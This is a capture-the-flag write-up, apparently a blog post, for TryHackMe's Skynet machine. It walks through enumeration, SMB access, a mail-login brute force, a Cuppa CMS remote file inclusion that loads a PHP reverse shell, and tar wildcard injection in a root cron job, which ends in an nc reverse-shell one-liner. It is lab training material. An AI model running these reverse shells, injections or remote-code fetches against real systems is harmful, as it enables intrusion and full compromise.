My Computer

17 object(s)
 

Skynet

Skynet is the fifth machine in the “Advanced Exploitation” part of TryHackMe’s “Offensive pentesting” path.


Enumeration

Let’s start with the nmap scan:

# Nmap 7.80 scan initiated Mon Oct 19 03:57:54 2020 as: nmap -sC -sV -o nmap.txt <target_ip>
Nmap scan report for <target_ip>
Host is up (0.042s latency).
Not shown: 994 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
|   256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_  256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open  pop3        Dovecot pop3d
|_pop3-capabilities: UIDL CAPA TOP RESP-CODES SASL AUTH-RESP-CODE PIPELINING
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
|_imap-capabilities: ID LOGINDISABLEDA0001 more have ENABLE OK SASL-IR LOGIN-REFERRALS IMAP4rev1 listed Pre-login IDLE post-login capabilities LITERAL+
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h39m59s, deviation: 2h53m12s, median: 0s
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: skynet
|   NetBIOS computer name: SKYNET\x00
|   Domain name: \x00
|   FQDN: skynet
|_  System time: 2020-10-19T02:58:07-05:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-10-19T07:58:07
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Oct 19 03:58:09 2020 -- 1 IP address (1 host up) scanned in 14.65 seconds

As there is port 80 open, let’s also run the gobuster:

gobuster dir -u http://<target_ip> -w /usr/share/seclists/Discovery/Web-Content/common.txt

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://<target_ip>
[+] Threads:        10
[+] Wordlist:       /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/10/19 03:58:37 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/admin (Status: 301)
/config (Status: 301)
/css (Status: 301)
/index.html (Status: 200)
/js (Status: 301)
/server-status (Status: 403)
/squirrelmail (Status: 301)
===============================================================
2020/10/19 03:58:57 Finished
===============================================================

We discovered /squirrelmail directory, but it required authorization.

Let’s enumerate more! We still have services that we didn’t check yet. What about smb?

smbmap -H  <target_ip>
[+] Guest session       IP: <target_ip>:445    Name: <target_ip>                                      
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        anonymous                                               READ ONLY       Skynet Anonymous Share
        milesdyson                                              NO ACCESS       Miles Dyson Personal Share
        IPC$                                                    NO ACCESS       IPC Service (skynet server (Samba, Ubuntu))

It seems that only anonymous is readable without authorization. It’s a good idea to check what is inside:

smbclient \\\\<target_ip>\\anonymous

smb: \> ls
  .                                   D        0  Wed Sep 18 00:41:20 2019
  ..                                  D        0  Tue Sep 17 03:20:17 2019
  attention.txt                       N      163  Tue Sep 17 23:04:59 2019
  logs                                D        0  Wed Sep 18 00:42:16 2019
  books                               D        0  Wed Sep 18 00:40:06 2019

                9204224 blocks of size 1024. 5373504 blocks available
smb: \> get attention.txt
getting file \attention.txt of size 163 as attention.txt (0.6 KiloBytes/sec) (average 0.6 KiloBytes/sec)

smb: \> cd logs
smb: \logs\> ls
  .                                   D        0  Wed Sep 18 00:42:16 2019
  ..                                  D        0  Wed Sep 18 00:41:20 2019
  log2.txt                            N        0  Wed Sep 18 00:42:13 2019
  log1.txt                            N      471  Wed Sep 18 00:41:59 2019
  log3.txt                            N        0  Wed Sep 18 00:42:16 2019

The content of attention.txt is:

A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson

Only log1.txt in the \logs is worth looking, as it contains a list of possible passwords:

cyborg007haloterminator
terminator22596
terminator219
terminator20
terminator1989
terminator1988
terminator168
terminator16
terminator143
terminator13
terminator123!@#
terminator1056
terminator101
terminator10
terminator02
terminator00
roboterminator
pongterminator
manasturcaluterminator
exterminator95
exterminator200
dterminator
djxterminator
dexterminator
determinator
cyborg007haloterminator
avsterminator
alonsoterminator
Walterminator
79terminator6
1996terminator

A short sum-up of the enumeration phase:

It less likely that ssh will be our way in, so let’s give squirrel mail a try.
Try to find the correct password for user milesdyson on http://<target_ip>/squirrelmail/src/login.php.
I used Burp Suite for that, Hydra would also do the trick, but you can do it manually, it will not take long. wink

Alright, we are in! Let’s check the emails.
One of them is very interesting, others are useless.
The email with the subject Samba Password reset will cough your eye immediately:

We have changed your smb password after system malfunction.
Password: )s{A&2Z=F^n_E.B`

This email was sent from skynet@skynet to the milesdyson, so now we have the password from smb share!
Login to the smb with this password and look around.

You will find the file that pointing out that something interesting can be found at the /45kra24zxs28v3yd.
We didn’t found that directory in the smb, let’s check maybe it’s on port 80?

Navigate to the http://<target_ip>/45kra24zxs28v3yd/ and check what’s there.
Not so useful, huh?
Fire up your gobuster one more time:

gobuster dir -u http://<target_ip>/45kra24zxs28v3yd/ -w /usr/share/seclists/Discovery/Web-Content/common.txt

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://<target_ip>/45kra24zxs28v3yd/
[+] Threads:        10
[+] Wordlist:       /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/10/19 04:21:37 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.hta (Status: 403)
/.htpasswd (Status: 403)
/administrator (Status: 301)
/index.html (Status: 200)
===============================================================
2020/10/19 04:21:58 Finished
===============================================================

Yet another vector! The /administrator directory leads us to the login form of the Cuppa CMS. Unfortunately, credentials that we already have will not work here.
Let’s look for other ways in.

We don’t know the version of the Cuppa CMS, but it will not harm anyone if we will check for the available exploits.

Exploitation

searchsploit cuppa

Cuppa CMS - '/alertConfigField.php' Local/Remote File | php/webapps/25971.txt

We have only one RFI. As we don’t have any other ideas let’s try it out:

Grab a copy of php-reverse-shell.php from PentestMonkey, specify there your IP and port.
Open nc listener:

sudo nc -nlvp 1337

Open the web server in the folder with your reverse shell:

 sudo python -m SimpleHTTPServer 80                                                                        

Finally, let’s trigger the exploit itself:

http://<target_ip>/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://<your_ip>/php-reverse-shell.php

Catch your shell!

You can upgrade your shell by

/usr/bin/script -qc /bin/bash /dev/null

PrivEsc

Transport your favorite tool for privilege escalations to the machine. As we already have SimpleHTTPServer on port 80 you can use it.
cd to the folder where you have access to writing (/tmp for instance) and download the tool.
I will use Linux Smart Enumeration this time:

www-data@skynet:/tmp$ wget http://<your_ip>/lse.sh
www-data@skynet:/tmp$ chmod +x lse.sh
www-data@skynet:/tmp$ ./lse.sh

lse has a great -l flag, which allows you to specify how many details will be shown. I can recommend starting without it, and if you will not find anything useful, run lse.sh again with -l 1, -l 2 or -l 3 accordingly.

You will eventually spot the CRON job is running on /home/milesdyson/backups/backup.sh. Let’s investigate:

www-data@skynet:/tmp$ ls -la /home/milesdyson/backups/backup.sh
-rwxr-xr-x 1 root root 74 Sep 17  2019 /home/milesdyson/backups/backup.sh

www-data@skynet:/tmp$ cat /home/milesdyson/backups/backup.sh
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *

So, we can’t edit the file, but what we can do, is the exploitation of the wildcard in the script.
You can read more about this vulnerability here.

Navigate to the /var/www/html and do the following:

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your_ip> <your_port> >/tmp/f" > shell.sh
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
touch "/var/www/html/--checkpoint=1"

Wait for a CRON job to execute your shell.sh.
Catch the root shell!

Takeaway